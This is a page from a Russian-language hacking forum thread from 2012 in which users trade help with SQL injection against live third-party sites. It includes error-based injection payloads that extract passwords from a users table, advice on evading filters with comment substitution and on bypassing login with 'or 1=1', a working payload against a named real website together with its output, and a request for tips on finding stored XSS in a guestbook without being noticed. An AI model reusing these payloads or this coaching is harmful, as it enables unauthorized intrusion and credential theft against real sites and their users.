HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1928 из 2438 « Первая < 9281428182818781918 1924 1925 1926 1927 1928 1929 1930 1931 1932 1938197820282428 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #19271  
Старый 13.01.2012, 20:05
shadowrun
Guest
Сообщений: n/a
Провел на форуме:
183267

Репутация: 84
По умолчанию
Цитата:
Сообщение от Ereee  
Ereee said:
не?
не

Цитата:
Сообщение от None  
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'or+1+and(select+1+from(select+count(*),concat((se lect+password+from+cosm_users+l' at line 1
Select id, password, login, admin from `cosm_users` as ` where login='admin'+or+1+and(select+1+from(select+count( *),concat((select+password+from+cosm_users+limit+0 ,1),floor(rand(0)*2))x+from+information_schema.tab les+group+by+x)a)--+' && admin='on'` where login='admin'+or+1+and(select+1+from(select+count( *),concat((select+password+from+cosm_users+limit+0 ,1),floor(rand(0)*2))x+from+information_schema.tab les+group+by+x)a)--+' && admin='on'
 
Ответить с цитированием

  #19272  
Старый 13.01.2012, 20:06
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию
Все + замени на /**/, а коммент на /*. Убери кавычку и т.д.
 
Ответить с цитированием

  #19273  
Старый 13.01.2012, 20:12
d1v
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401

Репутация: 0
По умолчанию
Цитата:
Сообщение от shadowrun  
shadowrun said:
не
можно попытаться обойти авторизацию, с помощью or 1=1,но тут нужно смотреть на примере. и ещё - я на 90% уверен, что на сайте есть инъекция и в get запросе.
 
Ответить с цитированием

  #19274  
Старый 13.01.2012, 20:17
shadowrun
Guest
Сообщений: n/a
Провел на форуме:
183267

Репутация: 84
По умолчанию
Цитата:
Сообщение от Ereee  
Ereee said:
Все + замени на /**/, а коммент на /*. Убери кавычку и т.д.
почти прокатил теперь, ска на коммент маериться

Цитата:
Сообщение от None  
syntax to use near '/*'
если без коммента, то

Цитата:
Сообщение от None  
syntax to use near ''
Спасибо, подобрал .
 
Ответить с цитированием

  #19275  
Старый 13.01.2012, 21:00
shadowrun
Guest
Сообщений: n/a
Провел на форуме:
183267

Репутация: 84
По умолчанию
Бле, не даром пятн 13

Теперь, когда пытаюсь вывести login пишет следующую хрень:

Цитата:
Сообщение от None  
Warning: mysql_query() [function.mysql-query]: Unable to save result set in...
Subquery returns more than 1 row
 
Ответить с цитированием

  #19276  
Старый 13.01.2012, 21:04
Expl0ited
Guest
Сообщений: n/a
Провел на форуме:
262707

Репутация: 935
По умолчанию
Цитата:
Сообщение от shadowrun  
shadowrun said:
Бле, не даром пятн 13
Теперь, когда пытаюсь вывести login пишет следующую хрень:
LIMIT юзай
 
Ответить с цитированием

  #19277  
Старый 13.01.2012, 21:40
oODungVTOo
Guest
Сообщений: n/a
Провел на форуме:
33429

Репутация: 0
По умолчанию
HElp SQli

Цитата:
Сообщение от None  
Invalid SQL Query!
http://www.adult-images.net/view_comments.php?gal=-455' /*!union*/ /*!select*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- -
 
Ответить с цитированием

  #19278  
Старый 13.01.2012, 21:47
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию
Цитата:
Сообщение от oODungVTOo  
oODungVTOo said:
HElp SQli
Код:
Code:
http://www.adult-images.net/view_comments.php?gal=455'+and(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+1
Ctrl+A

Код:
Code:
Duplicate entry 'COLLATIONS1' for key 'group_key'
 
Ответить с цитированием

  #19279  
Старый 13.01.2012, 22:21
NZT
Guest
Сообщений: n/a
Провел на форуме:
6075

Репутация: 0
По умолчанию
Скажите , меня интересует такой вопрос : пока я в гостевой ищю активную xss я вписываю разные вещи в поля чтобы найти xss, а редактировать свои сообщения нельзя , то даже когда я найду активную xss то админ гостевой зайдет и увидит кучу разных подозрительных сообщений которые я писал чтобы найти xss и прикроет дырку, и я не смогу этим ничего сделать. И даже пользователи что то заподозрят. Как можно искать активную xss незаметно чтобы обойтись только одним сообщением?(если нельзя редактировать) и чтобы никто ничего не заметил. Я вот это понять не могу. Заранее спасибо за ответ.
 
Ответить с цитированием

  #19280  
Старый 14.01.2012, 00:39
shadowrun
Guest
Сообщений: n/a
Провел на форуме:
183267

Репутация: 84
По умолчанию
Цитата:
Сообщение от Expl0ited  
Expl0ited said:
LIMIT юзай
Можно подробней?
 
Ответить с цитированием
Ответ
Страница 1928 из 2438 « Первая < 9281428182818781918 1924 1925 1926 1927 1928 1929 1930 1931 1932 1938197820282428 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ